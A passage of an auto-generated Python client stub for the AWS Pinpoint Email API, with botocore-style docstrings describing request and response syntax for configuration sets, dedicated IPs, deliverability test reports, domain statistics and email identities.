``true`` , email sending is enabled for the configuration set. If ``false`` , email sending is disabled for the configuration set.\n :type ConfigurationSetName: string\n :param ConfigurationSetName: **[REQUIRED]**\n The name of the configuration set that you want to obtain more information about.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def get_configuration_set_event_destinations(self, ConfigurationSetName: str) -> Dict:\n \"\"\"\n Retrieve a list of event destinations that are associated with a configuration set.\n In Amazon Pinpoint, *events* include message sends, deliveries, opens, clicks, bounces, and complaints. *Event destinations* are places that you can send information about these events to. For example, you can send event data to Amazon SNS to receive notifications when you receive bounces or complaints, or you can use Amazon Kinesis Data Firehose to stream data to Amazon S3 for long-term storage.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.get_configuration_set_event_destinations(\n ConfigurationSetName='string'\n )\n \n **Response Syntax**\n ::\n {\n 'EventDestinations': [\n {\n 'Name': 'string',\n 'Enabled': True|False,\n 'MatchingEventTypes': [\n 'SEND'|'REJECT'|'BOUNCE'|'COMPLAINT'|'DELIVERY'|'OPEN'|'CLICK'|'RENDERING_FAILURE',\n ],\n 'KinesisFirehoseDestination': {\n 'IamRoleArn': 'string',\n 'DeliveryStreamArn': 'string'\n },\n 'CloudWatchDestination': {\n 'DimensionConfigurations': [\n {\n 'DimensionName': 'string',\n 'DimensionValueSource': 'MESSAGE_TAG'|'EMAIL_HEADER'|'LINK_TAG',\n 'DefaultDimensionValue': 'string'\n },\n ]\n },\n 'SnsDestination': {\n 'TopicArn': 'string'\n },\n 'PinpointDestination': {\n 'ApplicationArn': 'string'\n }\n },\n ]\n }\n \n **Response Structure**\n - *(dict) --* \n Information about an event destination for a configuration set.\n - **EventDestinations** *(list) --* \n An array that includes all of the events destinations that have been configured for the configuration set.\n - *(dict) --* \n In Amazon Pinpoint, *events* include message sends, deliveries, opens, clicks, bounces, and complaints. *Event destinations* are places that you can send information about these events to. For example, you can send event data to Amazon SNS to receive notifications when you receive bounces or complaints, or you can use Amazon Kinesis Data Firehose to stream data to Amazon S3 for long-term storage.\n - **Name** *(string) --* \n A name that identifies the event destination.\n - **Enabled** *(boolean) --* \n If ``true`` , the event destination is enabled. When the event destination is enabled, the specified event types are sent to the destinations in this ``EventDestinationDefinition`` .\n If ``false`` , the event destination is disabled. When the event destination is disabled, events aren't sent to the specified destinations.\n - **MatchingEventTypes** *(list) --* \n The types of events that Amazon Pinpoint sends to the specified event destinations.\n - *(string) --* \n An email sending event type. For example, email sends, opens, and bounces are all email events.\n - **KinesisFirehoseDestination** *(dict) --* \n An object that defines an Amazon Kinesis Data Firehose destination for email events. You can use Amazon Kinesis Data Firehose to stream data to other services, such as Amazon S3 and Amazon Redshift.\n - **IamRoleArn** *(string) --* \n The Amazon Resource Name (ARN) of the IAM role that Amazon Pinpoint uses when sending email events to the Amazon Kinesis Data Firehose stream.\n - **DeliveryStreamArn** *(string) --* \n The Amazon Resource Name (ARN) of the Amazon Kinesis Data Firehose stream that Amazon Pinpoint sends email events to.\n - **CloudWatchDestination** *(dict) --* \n An object that defines an Amazon CloudWatch destination for email events. You can use Amazon CloudWatch to monitor and gain insights on your email sending metrics.\n - **DimensionConfigurations** *(list) --* \n An array of objects that define the dimensions to use when you send email events to Amazon CloudWatch.\n - *(dict) --* \n An object that defines the dimension configuration to use when you send Amazon Pinpoint email events to Amazon CloudWatch.\n - **DimensionName** *(string) --* \n The name of an Amazon CloudWatch dimension associated with an email sending metric. The name has to meet the following criteria:\n * It can only contain ASCII letters (a-z, A-Z), numbers (0-9), underscores (_), or dashes (-). \n * It can contain no more than 256 characters. \n - **DimensionValueSource** *(string) --* \n The location where Amazon Pinpoint finds the value of a dimension to publish to Amazon CloudWatch. If you want Amazon Pinpoint to use the message tags that you specify using an X-SES-MESSAGE-TAGS header or a parameter to the SendEmail/SendRawEmail API, choose ``messageTag`` . If you want Amazon Pinpoint to use your own email headers, choose ``emailHeader`` . If you want Amazon Pinpoint to use link tags, choose ``linkTags`` .\n - **DefaultDimensionValue** *(string) --* \n The default value of the dimension that is published to Amazon CloudWatch if you don't provide the value of the dimension when you send an email. This value has to meet the following criteria:\n * It can only contain ASCII letters (a-z, A-Z), numbers (0-9), underscores (_), or dashes (-). \n * It can contain no more than 256 characters. \n - **SnsDestination** *(dict) --* \n An object that defines an Amazon SNS destination for email events. You can use Amazon SNS to send notification when certain email events occur.\n - **TopicArn** *(string) --* \n The Amazon Resource Name (ARN) of the Amazon SNS topic that you want to publish email events to. For more information about Amazon SNS topics, see the `Amazon SNS Developer Guide `__ .\n - **PinpointDestination** *(dict) --* \n An object that defines a Amazon Pinpoint destination for email events. You can use Amazon Pinpoint events to create attributes in Amazon Pinpoint projects. You can use these attributes to create segments for your campaigns.\n - **ApplicationArn** *(string) --* \n The Amazon Resource Name (ARN) of the Amazon Pinpoint project that you want to send email events to.\n :type ConfigurationSetName: string\n :param ConfigurationSetName: **[REQUIRED]**\n The name of the configuration set that contains the event destination.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def get_dedicated_ip(self, Ip: str) -> Dict:\n \"\"\"\n Get information about a dedicated IP address, including the name of the dedicated IP pool that it's associated with, as well information about the automatic warm-up process for the address.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.get_dedicated_ip(\n Ip='string'\n )\n \n **Response Syntax**\n ::\n {\n 'DedicatedIp': {\n 'Ip': 'string',\n 'WarmupStatus': 'IN_PROGRESS'|'DONE',\n 'WarmupPercentage': 123,\n 'PoolName': 'string'\n }\n }\n \n **Response Structure**\n - *(dict) --* \n Information about a dedicated IP address.\n - **DedicatedIp** *(dict) --* \n An object that contains information about a dedicated IP address.\n - **Ip** *(string) --* \n An IP address that is reserved for use by your Amazon Pinpoint account.\n - **WarmupStatus** *(string) --* \n The warm-up status of a dedicated IP address. The status can have one of the following values:\n * ``IN_PROGRESS`` – The IP address isn't ready to use because the dedicated IP warm-up process is ongoing. \n * ``DONE`` – The dedicated IP warm-up process is complete, and the IP address is ready to use. \n - **WarmupPercentage** *(integer) --* \n Indicates how complete the dedicated IP warm-up process is. When this value equals 1, the address has completed the warm-up process and is ready for use.\n - **PoolName** *(string) --* \n The name of the dedicated IP pool that the IP address is associated with.\n :type Ip: string\n :param Ip: **[REQUIRED]**\n The IP address that you want to obtain more information about. The value you specify has to be a dedicated IP address that\\'s assocaited with your Amazon Pinpoint account.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def get_dedicated_ips(self, PoolName: str = None, NextToken: str = None, PageSize: int = None) -> Dict:\n \"\"\"\n List the dedicated IP addresses that are associated with your Amazon Pinpoint account.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.get_dedicated_ips(\n PoolName='string',\n NextToken='string',\n PageSize=123\n )\n \n **Response Syntax**\n ::\n {\n 'DedicatedIps': [\n {\n 'Ip': 'string',\n 'WarmupStatus': 'IN_PROGRESS'|'DONE',\n 'WarmupPercentage': 123,\n 'PoolName': 'string'\n },\n ],\n 'NextToken': 'string'\n }\n \n **Response Structure**\n - *(dict) --* \n Information about the dedicated IP addresses that are associated with your Amazon Pinpoint account.\n - **DedicatedIps** *(list) --* \n A list of dedicated IP addresses that are reserved for use by your Amazon Pinpoint account.\n - *(dict) --* \n Contains information about a dedicated IP address that is associated with your Amazon Pinpoint account.\n - **Ip** *(string) --* \n An IP address that is reserved for use by your Amazon Pinpoint account.\n - **WarmupStatus** *(string) --* \n The warm-up status of a dedicated IP address. The status can have one of the following values:\n * ``IN_PROGRESS`` – The IP address isn't ready to use because the dedicated IP warm-up process is ongoing. \n * ``DONE`` – The dedicated IP warm-up process is complete, and the IP address is ready to use. \n - **WarmupPercentage** *(integer) --* \n Indicates how complete the dedicated IP warm-up process is. When this value equals 1, the address has completed the warm-up process and is ready for use.\n - **PoolName** *(string) --* \n The name of the dedicated IP pool that the IP address is associated with.\n - **NextToken** *(string) --* \n A token that indicates that there are additional dedicated IP addresses to list. To view additional addresses, issue another request to ``GetDedicatedIps`` , passing this token in the ``NextToken`` parameter.\n :type PoolName: string\n :param PoolName:\n The name of the IP pool that the dedicated IP address is associated with.\n :type NextToken: string\n :param NextToken:\n A token returned from a previous call to ``GetDedicatedIps`` to indicate the position of the dedicated IP pool in the list of IP pools.\n :type PageSize: integer\n :param PageSize:\n The number of results to show in a single call to ``GetDedicatedIpsRequest`` . If the number of results is larger than the number you specified in this parameter, then the response includes a ``NextToken`` element, which you can use to obtain additional results.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def get_deliverability_dashboard_options(self) -> Dict:\n \"\"\"\n Show the status of the Deliverability dashboard. When the Deliverability dashboard is enabled, you gain access to reputation metrics for the domains that you use to send email using Amazon Pinpoint. You also gain the ability to perform predictive inbox placement tests.\n When you use the Deliverability dashboard, you pay a monthly charge of USD$1,250.00, in addition to any other fees that you accrue by using Amazon Pinpoint. If you enable the Deliverability dashboard after the first day of a calendar month, AWS prorates the monthly charge based on how many days have elapsed in the current calendar month.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.get_deliverability_dashboard_options()\n \n **Response Syntax**\n ::\n {\n 'DashboardEnabled': True|False\n }\n \n **Response Structure**\n - *(dict) --* \n An object that shows the status of the Deliverability dashboard for your Amazon Pinpoint account.\n - **DashboardEnabled** *(boolean) --* \n Indicates whether the Deliverability dashboard is enabled. If the value is ``true`` , then the dashboard is enabled.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def get_deliverability_test_report(self, ReportId: str) -> Dict:\n \"\"\"\n Retrieve the results of a predictive inbox placement test.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.get_deliverability_test_report(\n ReportId='string'\n )\n \n **Response Syntax**\n ::\n {\n 'DeliverabilityTestReport': {\n 'ReportId': 'string',\n 'ReportName': 'string',\n 'Subject': 'string',\n 'FromEmailAddress': 'string',\n 'CreateDate': datetime(2015, 1, 1),\n 'DeliverabilityTestStatus': 'IN_PROGRESS'|'COMPLETED'\n },\n 'OverallPlacement': {\n 'InboxPercentage': 123.0,\n 'SpamPercentage': 123.0,\n 'MissingPercentage': 123.0,\n 'SpfPercentage': 123.0,\n 'DkimPercentage': 123.0\n },\n 'IspPlacements': [\n {\n 'IspName': 'string',\n 'PlacementStatistics': {\n 'InboxPercentage': 123.0,\n 'SpamPercentage': 123.0,\n 'MissingPercentage': 123.0,\n 'SpfPercentage': 123.0,\n 'DkimPercentage': 123.0\n }\n },\n ],\n 'Message': 'string'\n }\n \n **Response Structure**\n - *(dict) --* \n The results of the predictive inbox placement test.\n - **DeliverabilityTestReport** *(dict) --* \n An object that contains the results of the predictive inbox placement test.\n - **ReportId** *(string) --* \n A unique string that identifies the predictive inbox placement test.\n - **ReportName** *(string) --* \n A name that helps you identify a predictive inbox placement test report.\n - **Subject** *(string) --* \n The subject line for an email that you submitted in a predictive inbox placement test.\n - **FromEmailAddress** *(string) --* \n The sender address that you specified for the predictive inbox placement test.\n - **CreateDate** *(datetime) --* \n The date and time when the predictive inbox placement test was created, in Unix time format.\n - **DeliverabilityTestStatus** *(string) --* \n The status of the predictive inbox placement test. If the status is ``IN_PROGRESS`` , then the predictive inbox placement test is currently running. Predictive inbox placement tests are usually complete within 24 hours of creating the test. If the status is ``COMPLETE`` , then the test is finished, and you can use the ``GetDeliverabilityTestReport`` to view the results of the test.\n - **OverallPlacement** *(dict) --* \n An object that specifies how many test messages that were sent during the predictive inbox placement test were delivered to recipients' inboxes, how many were sent to recipients' spam folders, and how many weren't delivered.\n - **InboxPercentage** *(float) --* \n The percentage of emails that arrived in recipients' inboxes during the predictive inbox placement test.\n - **SpamPercentage** *(float) --* \n The percentage of emails that arrived in recipients' spam or junk mail folders during the predictive inbox placement test.\n - **MissingPercentage** *(float) --* \n The percentage of emails that didn't arrive in recipients' inboxes at all during the predictive inbox placement test.\n - **SpfPercentage** *(float) --* \n The percentage of emails that were authenticated by using Sender Policy Framework (SPF) during the predictive inbox placement test.\n - **DkimPercentage** *(float) --* \n The percentage of emails that were authenticated by using DomainKeys Identified Mail (DKIM) during the predictive inbox placement test.\n - **IspPlacements** *(list) --* \n An object that describes how the test email was handled by several email providers, including Gmail, Hotmail, Yahoo, AOL, and others.\n - *(dict) --* \n An object that describes how email sent during the predictive inbox placement test was handled by a certain email provider.\n - **IspName** *(string) --* \n The name of the email provider that the inbox placement data applies to.\n - **PlacementStatistics** *(dict) --* \n An object that contains inbox placement metrics for a specific email provider.\n - **InboxPercentage** *(float) --* \n The percentage of emails that arrived in recipients' inboxes during the predictive inbox placement test.\n - **SpamPercentage** *(float) --* \n The percentage of emails that arrived in recipients' spam or junk mail folders during the predictive inbox placement test.\n - **MissingPercentage** *(float) --* \n The percentage of emails that didn't arrive in recipients' inboxes at all during the predictive inbox placement test.\n - **SpfPercentage** *(float) --* \n The percentage of emails that were authenticated by using Sender Policy Framework (SPF) during the predictive inbox placement test.\n - **DkimPercentage** *(float) --* \n The percentage of emails that were authenticated by using DomainKeys Identified Mail (DKIM) during the predictive inbox placement test.\n - **Message** *(string) --* \n An object that contains the message that you sent when you performed this predictive inbox placement test.\n :type ReportId: string\n :param ReportId: **[REQUIRED]**\n A unique string that identifies the predictive inbox placement test.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def get_domain_statistics_report(self, Domain: str, StartDate: datetime, EndDate: datetime) -> Dict:\n \"\"\"\n Retrieve inbox placement and engagement rates for the domains that you use to send email.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.get_domain_statistics_report(\n Domain='string',\n StartDate=datetime(2015, 1, 1),\n EndDate=datetime(2015, 1, 1)\n )\n \n **Response Syntax**\n ::\n {\n 'OverallVolume': {\n 'VolumeStatistics': {\n 'InboxRawCount': 123,\n 'SpamRawCount': 123,\n 'ProjectedInbox': 123,\n 'ProjectedSpam': 123\n },\n 'ReadRatePercent': 123.0,\n 'DomainIspPlacements': [\n {\n 'IspName': 'string',\n 'InboxRawCount': 123,\n 'SpamRawCount': 123,\n 'InboxPercentage': 123.0,\n 'SpamPercentage': 123.0\n },\n ]\n },\n 'DailyVolumes': [\n {\n 'StartDate': datetime(2015, 1, 1),\n 'VolumeStatistics': {\n 'InboxRawCount': 123,\n 'SpamRawCount': 123,\n 'ProjectedInbox': 123,\n 'ProjectedSpam': 123\n },\n 'DomainIspPlacements': [\n {\n 'IspName': 'string',\n 'InboxRawCount': 123,\n 'SpamRawCount': 123,\n 'InboxPercentage': 123.0,\n 'SpamPercentage': 123.0\n },\n ]\n },\n ]\n }\n \n **Response Structure**\n - *(dict) --* \n An object that includes statistics that are related to the domain that you specified.\n - **OverallVolume** *(dict) --* \n An object that contains deliverability metrics for the domain that you specified. The data in this object is a summary of all of the data that was collected from the ``StartDate`` to the ``EndDate`` .\n - **VolumeStatistics** *(dict) --* \n An object that contains information about the numbers of messages that arrived in recipients' inboxes and junk mail folders.\n - **InboxRawCount** *(integer) --* \n The total number of emails that arrived in recipients' inboxes.\n - **SpamRawCount** *(integer) --* \n The total number of emails that arrived in recipients' spam or junk mail folders.\n - **ProjectedInbox** *(integer) --* \n An estimate of the percentage of emails sent from the current domain that will arrive in recipients' inboxes.\n - **ProjectedSpam** *(integer) --* \n An estimate of the percentage of emails sent from the current domain that will arrive in recipients' spam or junk mail folders.\n - **ReadRatePercent** *(float) --* \n The percentage of emails that were sent from the domain that were read by their recipients.\n - **DomainIspPlacements** *(list) --* \n An object that contains inbox and junk mail placement metrics for individual email providers.\n - *(dict) --* \n An object that contains inbox placement data for email sent from one of your email domains to a specific email provider.\n - **IspName** *(string) --* \n The name of the email provider that the inbox placement data applies to.\n - **InboxRawCount** *(integer) --* \n The total number of messages that were sent from the selected domain to the specified email provider that arrived in recipients' inboxes.\n - **SpamRawCount** *(integer) --* \n The total number of messages that were sent from the selected domain to the specified email provider that arrived in recipients' spam or junk mail folders.\n - **InboxPercentage** *(float) --* \n The percentage of messages that were sent from the selected domain to the specified email provider that arrived in recipients' inboxes.\n - **SpamPercentage** *(float) --* \n The percentage of messages that were sent from the selected domain to the specified email provider that arrived in recipients' spam or junk mail folders.\n - **DailyVolumes** *(list) --* \n An object that contains deliverability metrics for the domain that you specified. This object contains data for each day, starting on the ``StartDate`` and ending on the ``EndDate`` .\n - *(dict) --* \n An object that contains information about the volume of email sent on each day of the analysis period.\n - **StartDate** *(datetime) --* \n The date that the DailyVolume metrics apply to, in Unix time.\n - **VolumeStatistics** *(dict) --* \n An object that contains inbox placement metrics for a specific day in the analysis period.\n - **InboxRawCount** *(integer) --* \n The total number of emails that arrived in recipients' inboxes.\n - **SpamRawCount** *(integer) --* \n The total number of emails that arrived in recipients' spam or junk mail folders.\n - **ProjectedInbox** *(integer) --* \n An estimate of the percentage of emails sent from the current domain that will arrive in recipients' inboxes.\n - **ProjectedSpam** *(integer) --* \n An estimate of the percentage of emails sent from the current domain that will arrive in recipients' spam or junk mail folders.\n - **DomainIspPlacements** *(list) --* \n An object that contains inbox placement metrics for a specifid day in the analysis period, broken out by the recipient's email provider.\n - *(dict) --* \n An object that contains inbox placement data for email sent from one of your email domains to a specific email provider.\n - **IspName** *(string) --* \n The name of the email provider that the inbox placement data applies to.\n - **InboxRawCount** *(integer) --* \n The total number of messages that were sent from the selected domain to the specified email provider that arrived in recipients' inboxes.\n - **SpamRawCount** *(integer) --* \n The total number of messages that were sent from the selected domain to the specified email provider that arrived in recipients' spam or junk mail folders.\n - **InboxPercentage** *(float) --* \n The percentage of messages that were sent from the selected domain to the specified email provider that arrived in recipients' inboxes.\n - **SpamPercentage** *(float) --* \n The percentage of messages that were sent from the selected domain to the specified email provider that arrived in recipients' spam or junk mail folders.\n :type Domain: string\n :param Domain: **[REQUIRED]**\n The domain that you want to obtain deliverability metrics for.\n :type StartDate: datetime\n :param StartDate: **[REQUIRED]**\n The first day (in Unix time) that you want to obtain domain deliverability metrics for.\n :type EndDate: datetime\n :param EndDate: **[REQUIRED]**\n The last day (in Unix time) that you want to obtain domain deliverability metrics for. The ``EndDate`` that you specify has to be less than or equal to 30 days after the ``StartDate`` .\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def get_email_identity(self, EmailIdentity: str) -> Dict:\n \"\"\"\n Provides information about a specific identity associated with your Amazon Pinpoint account, including the identity's verification status, its DKIM authentication status, and its custom Mail-From settings.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.get_email_identity(\n EmailIdentity='string'\n )\n \n **Response Syntax**\n ::\n {\n 'IdentityType': 'EMAIL_ADDRESS'|'DOMAIN'|'MANAGED_DOMAIN',\n 'FeedbackForwardingStatus': True|False,\n 'VerifiedForSendingStatus': True|False,\n 'DkimAttributes': {\n 'SigningEnabled': True|False,\n 'Status': 'PENDING'|'SUCCESS'|'FAILED'|'TEMPORARY_FAILURE'|'NOT_STARTED',\n 'Tokens': [\n 'string',\n ]\n },\n 'MailFromAttributes': {\n 'MailFromDomain': 'string',\n 'MailFromDomainStatus': 'PENDING'|'SUCCESS'|'FAILED'|'TEMPORARY_FAILURE',\n 'BehaviorOnMxFailure': 'USE_DEFAULT_VALUE'|'REJECT_MESSAGE'\n }\n }\n \n **Response Structure**\n - *(dict) --* \n Details about an email identity.\n - **IdentityType** *(string) --* \n The email identity type.\n - **FeedbackForwardingStatus** *(boolean) --* \n The feedback forwarding configuration for the identity.\n If the value is ``true`` , Amazon Pinpoint sends you email notifications when bounce or complaint events occur. Amazon Pinpoint sends this notification to the address that you specified in the Return-Path header of the original email.\n When you set this value to ``false`` , Amazon Pinpoint sends notifications through other mechanisms, such as by notifying an Amazon SNS topic or another event destination. You're required to have a method of tracking bounces and complaints. If you haven't set up another mechanism for receiving bounce or complaint notifications, Amazon Pinpoint sends an email notification when these events occur (even if this setting is disabled).\n - **VerifiedForSendingStatus** *(boolean) --* \n Specifies whether or not the identity is verified. In Amazon Pinpoint, you can only send email from verified email addresses or domains. For more information about verifying identities, see the `Amazon Pinpoint User Guide `__ .\n - **DkimAttributes** *(dict) --* \n An object that contains information about the DKIM attributes for the identity. This object includes the tokens that you use to create the CNAME records that are required to complete the DKIM verification process.\n - **SigningEnabled** *(boolean) --* \n If the value is ``true`` , then the messages that Amazon Pinpoint sends from the identity are DKIM-signed. If the value is ``false`` , then the messages that Amazon Pinpoint sends from the identity aren't DKIM-signed.\n - **Status** *(string) --* \n Describes whether or not Amazon Pinpoint has successfully located the DKIM records in the DNS records for the domain. The status can be one of the following:\n * ``PENDING`` – Amazon Pinpoint hasn't yet located the DKIM records in the DNS configuration for the domain, but will continue to attempt to locate them. \n * ``SUCCESS`` – Amazon Pinpoint located the DKIM records in the DNS configuration for the domain and determined that they're correct. Amazon Pinpoint can now send DKIM-signed email from the identity. \n * ``FAILED`` – Amazon Pinpoint was unable to locate the DKIM records in the DNS settings for the domain, and won't continue to search for them. \n * ``TEMPORARY_FAILURE`` – A temporary issue occurred, which prevented Amazon Pinpoint from determining the DKIM status for the domain. \n * ``NOT_STARTED`` – Amazon Pinpoint hasn't yet started searching for the DKIM records in the DKIM records for the domain. \n - **Tokens** *(list) --* \n A set of unique strings that you use to create a set of CNAME records that you add to the DNS configuration for your domain. When Amazon Pinpoint detects these records in the DNS configuration for your domain, the DKIM authentication process is complete. Amazon Pinpoint usually detects these records within about 72 hours of adding them to the DNS configuration for your domain.\n - *(string) --* \n - **MailFromAttributes** *(dict) --* \n An object that contains information about the Mail-From attributes for the email identity.\n - **MailFromDomain** *(string) --* \n The name of a domain that an email identity uses as a custom MAIL FROM domain.\n - **MailFromDomainStatus** *(string) --* \n The status of the MAIL FROM domain. This status can have the following values:\n * ``PENDING`` – Amazon Pinpoint hasn't started searching for the MX record yet. \n * ``SUCCESS`` – Amazon Pinpoint detected the required MX record for the MAIL FROM domain. \n * ``FAILED`` – Amazon Pinpoint can't find the required MX record, or the record no longer exists. \n * ``TEMPORARY_FAILURE`` – A temporary issue occurred, which prevented Amazon Pinpoint from determining the status of the MAIL FROM domain. \n - **BehaviorOnMxFailure** *(string) --* \n The action that Amazon Pinpoint to takes if it can't read the required MX record for a custom MAIL FROM domain. When you set this value to ``UseDefaultValue`` , Amazon Pinpoint uses *amazonses.com* as the MAIL FROM domain. When you set this value to ``RejectMessage`` , Amazon Pinpoint returns a ``MailFromDomainNotVerified`` error, and doesn't attempt to deliver the email.\n These behaviors are taken when the custom MAIL FROM domain configuration is in the ``Pending`` , ``Failed`` , and ``TemporaryFailure`` states.\n :type EmailIdentity: string\n :param EmailIdentity: **[REQUIRED]**\n The email identity that you want to retrieve details for.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def get_paginator(self, operation_name: str = None) -> Paginator:\n \"\"\"\n Create a paginator for an operation.\n :type operation_name: string\n :param operation_name: The operation name. This is the same name\n as the method name on the client. For example, if the\n method name is ``create_foo``, and you\\'d normally invoke the\n operation as ``client.create_foo(**kwargs)``, if the\n ``create_foo`` operation can be paginated, you can use the\n call ``client.get_paginator(\\\"create_foo\\\")``.\n :raise OperationNotPageableError: Raised if the operation is not\n pageable. You can use the ``client.can_paginate`` method to\n check if an operation is pageable.\n :rtype: L{botocore.paginate.Paginator}\n :return: A paginator object.\n \"\"\"\n pass\n\n def get_waiter(self, waiter_name: str = None) -> Waiter:\n \"\"\"\n Returns an object that can wait for some condition.\n :type waiter_name: str\n :param waiter_name: The name of the waiter to get. See the waiters\n section of the service docs for a list of available waiters.\n :returns: The specified waiter object.\n :rtype: botocore.waiter.Waiter\n \"\"\"\n pass\n\n def list_configuration_sets(self, NextToken: str = None, PageSize: int = None) -> Dict:\n \"\"\"\n List all of the configuration sets associated with your Amazon Pinpoint account in the current region.\n In Amazon Pinpoint, *configuration sets* are groups of rules that you can apply to the emails you send. You apply a configuration set to an email by including a reference to the configuration set in the headers of the email. When you apply a configuration set to an email, all of the rules in that configuration set are applied to the email.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.list_configuration_sets(\n NextToken='string',\n PageSize=123\n )\n \n **Response Syntax**\n ::\n {\n 'ConfigurationSets': [\n 'string',\n ],\n 'NextToken': 'string'\n }\n \n **Response Structure**\n - *(dict) --* \n A list of configuration sets in your Amazon Pinpoint account in the current AWS Region.\n - **ConfigurationSets** *(list) --* \n An array that contains all of the configuration sets in your Amazon Pinpoint account in the current AWS Region.\n - *(string) --* \n The name of a configuration set.\n In Amazon Pinpoint, *configuration sets* are groups of rules that you can apply to the emails you send. You apply a configuration set to an email by including a reference to the configuration set in the headers of the email. When you apply a configuration set to an email, all of the rules in that configuration set are applied to the email.\n - **NextToken** *(string) --* \n A token that indicates that there are additional configuration sets to list. To view additional configuration sets, issue another request to ``ListConfigurationSets`` , and pass this token in the ``NextToken`` parameter.\n :type NextToken: string\n :param NextToken:\n A token returned from a previous call to ``ListConfigurationSets`` to indicate the position in the list of configuration sets.\n :type PageSize: integer\n :param PageSize:\n The number of results to show in a single call to ``ListConfigurationSets`` . If the number of results is larger than the number you specified in this parameter, then the response includes a ``NextToken`` element, which you can use to obtain additional results.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def list_dedicated_ip_pools(self, NextToken: str = None, PageSize: int = None) -> Dict:\n \"\"\"\n List all of the dedicated IP pools that exist in your Amazon Pinpoint account in the current AWS Region.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.list_dedicated_ip_pools(\n NextToken='string',\n PageSize=123\n )\n \n **Response Syntax**\n ::\n {\n 'DedicatedIpPools': [\n 'string',\n ],\n 'NextToken': 'string'\n }\n \n **Response Structure**\n - *(dict) --* \n A list of dedicated IP pools.\n - **DedicatedIpPools** *(list) --* \n A list of all of the dedicated IP pools that are associated with your Amazon Pinpoint account.\n - *(string) --* \n The name of a dedicated IP pool.\n - **NextToken** *(string) --* \n A token that indicates that there are additional IP pools to list. To view additional IP pools, issue another request to ``ListDedicatedIpPools`` , passing this token in the ``NextToken`` parameter.\n :type NextToken: string\n :param NextToken:\n A token returned from a previous call to ``ListDedicatedIpPools`` to indicate the position in the list of dedicated IP pools.\n :type PageSize: integer\n :param PageSize:\n The number of results to show in a single call to ``ListDedicatedIpPools`` . If the number of results is larger than the number you specified in this parameter, then the response includes a ``NextToken`` element, which you can use to obtain additional results.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def list_deliverability_test_reports(self, NextToken: str = None, PageSize: int = None) -> Dict:\n \"\"\"\n Show a list of the predictive inbox placement tests that you've performed, regardless of their statuses. For predictive inbox placement tests that are complete, you can use the ``GetDeliverabilityTestReport`` operation to view the results.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.list_deliverability_test_reports(\n NextToken='string',\n PageSize=123\n )\n \n **Response Syntax**\n ::\n {\n 'DeliverabilityTestReports': [\n {\n 'ReportId': 'string',\n 'ReportName': 'string',\n 'Subject': 'string',\n 'FromEmailAddress': 'string',\n 'CreateDate': datetime(2015, 1, 1),\n 'DeliverabilityTestStatus': 'IN_PROGRESS'|'COMPLETED'\n },\n ],\n 'NextToken': 'string'\n }\n \n **Response Structure**\n - *(dict) --* \n A list of the predictive inbox placement test reports that are available for your account, regardless of whether or not those tests are complete.\n - **DeliverabilityTestReports** *(list) --* \n An object that contains a lists of predictive inbox placement tests that you've performed.\n - *(dict) --* \n An object that contains metadata related to a predictive inbox placement test.\n - **ReportId** *(string) --* \n A unique string that identifies the predictive inbox placement test.\n - **ReportName** *(string) --* \n A name that helps you identify a predictive inbox placement test report.\n - **Subject** *(string) --* \n The subject line for an email that you submitted in a predictive inbox placement test.\n - **FromEmailAddress** *(string) --* \n The sender address that you specified for the predictive inbox placement test.\n - **CreateDate** *(datetime) --* \n The date and time when the predictive inbox placement test was created, in Unix time format.\n - **DeliverabilityTestStatus** *(string) --* \n The status of the predictive inbox placement test. If the status is ``IN_PROGRESS`` , then the predictive inbox placement test is currently running. Predictive inbox placement tests are usually complete within 24 hours of creating the test. If the status is ``COMPLETE`` , then the test is finished, and you can use the ``GetDeliverabilityTestReport`` to view the results of the test.\n - **NextToken** *(string) --* \n A token that indicates that there are additional predictive inbox placement tests to list. To view additional predictive inbox placement tests, issue another request to ``ListDeliverabilityTestReports`` , and pass this token in the ``NextToken`` parameter.\n :type NextToken: string\n :param NextToken:\n A token returned from a previous call to ``ListDeliverabilityTestReports`` to indicate the position in the list of predictive inbox placement tests.\n :type PageSize: integer\n :param PageSize:\n The number of results to show in a single call to ``ListDeliverabilityTestReports`` . If the number of results is larger than the number you specified in this parameter, then the response includes a ``NextToken`` element, which you can use to obtain additional results.\n The value you specify has to be at least 0, and can be no more than 1000.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def list_email_identities(self, NextToken: str = None, PageSize: int = None) -> Dict:\n \"\"\"\n Returns a list of all of the email identities that are associated with your Amazon Pinpoint account. An identity can be either an email address or a domain. This operation returns identities that are verified as well as those that aren't.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.list_email_identities(\n NextToken='string',\n PageSize=123\n )\n \n **Response Syntax**\n ::\n {\n 'EmailIdentities': [\n {\n 'IdentityType': 'EMAIL_ADDRESS'|'DOMAIN'|'MANAGED_DOMAIN',\n 'IdentityName': 'string',\n 'SendingEnabled': True|False\n },\n ],\n 'NextToken': 'string'\n }\n \n **Response Structure**\n - *(dict) --* \n A list of all of the identities that you've attempted to verify for use with Amazon Pinpoint, regardless of whether or not those identities were successfully verified.\n - **EmailIdentities** *(list) --* \n An array that includes all of the identities associated with your Amazon Pinpoint account.\n - *(dict) --* \n Information about an email identity.\n - **IdentityType** *(string) --* \n The email identity type. The identity type can be one of the following:\n * ``EMAIL_ADDRESS`` – The identity is an email address. \n * ``DOMAIN`` – The identity is a domain. \n * 